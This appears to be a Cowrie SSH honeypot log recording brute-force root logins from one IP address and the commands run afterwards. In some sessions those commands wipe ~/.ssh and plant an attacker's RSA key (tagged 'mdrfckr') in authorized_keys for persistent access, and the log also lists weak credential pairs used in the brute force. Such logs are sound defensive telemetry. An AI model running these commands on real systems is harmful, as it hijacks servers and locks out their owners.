{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:01:01.536725Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:01:01.783960Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.login.success","username":"root","password":"h123","message":"login attempt [root/h123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:01:02.795218Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:01:03.366313Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:01:03.367173Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:01:03.368101Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:01:03.622346Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:01:04.148734Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:01:04.149547Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:01:04.404588Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:01:04.405702Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38917,"dst_ip":"1.2.3.4","dst_port":22,"session":"294ae7ff460d","protocol":"ssh","message":"New connection: 212.227.235.229:38917 (1.2.3.4:22) [session: 294ae7ff460d]","sensor":"my-vps","timestamp":"2025-08-26T19:01:04.654213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:01:04.662245Z","src_ip":"212.227.235.229","session":"294ae7ff460d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:01:04.908023Z","src_ip":"212.227.235.229","session":"294ae7ff460d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:01:05.904244Z","src_ip":"212.227.235.229","session":"294ae7ff460d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:01:07.154139Z","src_ip":"212.227.235.229","session":"294ae7ff460d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39479,"dst_ip":"1.2.3.4","dst_port":22,"session":"972e9d5db880","protocol":"ssh","message":"New connection: 212.227.235.229:39479 (1.2.3.4:22) [session: 972e9d5db880]","sensor":"my-vps","timestamp":"2025-08-26T19:01:07.412087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:01:07.419053Z","src_ip":"212.227.235.229","session":"972e9d5db880"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:01:07.679460Z","src_ip":"212.227.235.229","session":"972e9d5db880"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:01:08.731165Z","src_ip":"212.227.235.229","session":"972e9d5db880"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:01:08.996198Z","src_ip":"212.227.235.229","session":"5467014c28f0"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:01:08.996942Z","src_ip":"212.227.235.229","session":"972e9d5db880"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":13556,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9b13292ddac","protocol":"ssh","message":"New connection: 212.227.235.229:13556 (1.2.3.4:22) [session: d9b13292ddac]","sensor":"my-vps","timestamp":"2025-08-26T19:01:26.108826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:01:26.123248Z","src_ip":"212.227.235.229","session":"d9b13292ddac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:01:26.355163Z","src_ip":"212.227.235.229","session":"d9b13292ddac"}
{"eventid":"cowrie.login.success","username":"root","password":"Welkom01","message":"login attempt [root/Welkom01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:01:27.121550Z","src_ip":"212.227.235.229","session":"d9b13292ddac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:01:27.870506Z","src_ip":"212.227.235.229","session":"d9b13292ddac"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-26T19:01:27.871331Z","src_ip":"212.227.235.229","session":"d9b13292ddac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:01:28.114011Z","src_ip":"212.227.235.229","session":"d9b13292ddac"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:01:28.202524Z","src_ip":"212.227.235.229","session":"d9b13292ddac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51530,"dst_ip":"1.2.3.4","dst_port":22,"session":"634739e0466f","protocol":"ssh","message":"New connection: 212.227.235.229:51530 (1.2.3.4:22) [session: 634739e0466f]","sensor":"my-vps","timestamp":"2025-08-26T19:01:30.445270Z"}
{"eventid":"cowrie.session.closed","duration":"14.8","message":"Connection lost after 14.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:01:45.270228Z","src_ip":"212.227.235.229","session":"634739e0466f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50975,"dst_ip":"1.2.3.4","dst_port":22,"session":"34c3695babf2","protocol":"ssh","message":"New connection: 212.227.235.229:50975 (1.2.3.4:22) [session: 34c3695babf2]","sensor":"my-vps","timestamp":"2025-08-26T19:02:06.937187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:02:06.944166Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:02:07.203861Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456789","message":"login attempt [root/qQ123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:02:08.252835Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:02:08.810199Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:02:08.811008Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:02:08.812289Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:02:09.078063Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:02:09.699292Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:02:09.700004Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:02:09.964139Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:02:09.965376Z","src_ip":"212.227.235.229","session":"34c3695babf2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51675,"dst_ip":"1.2.3.4","dst_port":22,"session":"691212aa9eca","protocol":"ssh","message":"New connection: 212.227.235.229:51675 (1.2.3.4:22) [session: 691212aa9eca]","sensor":"my-vps","timestamp":"2025-08-26T19:02:10.215268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:02:10.219517Z","src_ip":"212.227.235.229","session":"691212aa9eca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:02:10.471803Z","src_ip":"212.227.235.229","session":"691212aa9eca"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:02:11.473150Z","src_ip":"212.227.235.229","session":"691212aa9eca"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:02:12.732645Z","src_ip":"212.227.235.229","session":"691212aa9eca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52309,"dst_ip":"1.2.3.4","dst_port":22,"session":"14cc777179c4","protocol":"ssh","message":"New connection: 212.227.235.229:52309 (1.2.3.4:22) [session: 14cc777179c4]","sensor":"my-vps","timestamp":"2025-08-26T19:02:12.987150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:02:12.988888Z","src_ip":"212.227.235.229","session":"14cc777179c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:02:13.240812Z","src_ip":"212.227.235.229","session":"14cc777179c4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:02:14.256953Z","src_ip":"212.227.235.229","session":"14cc777179c4"}
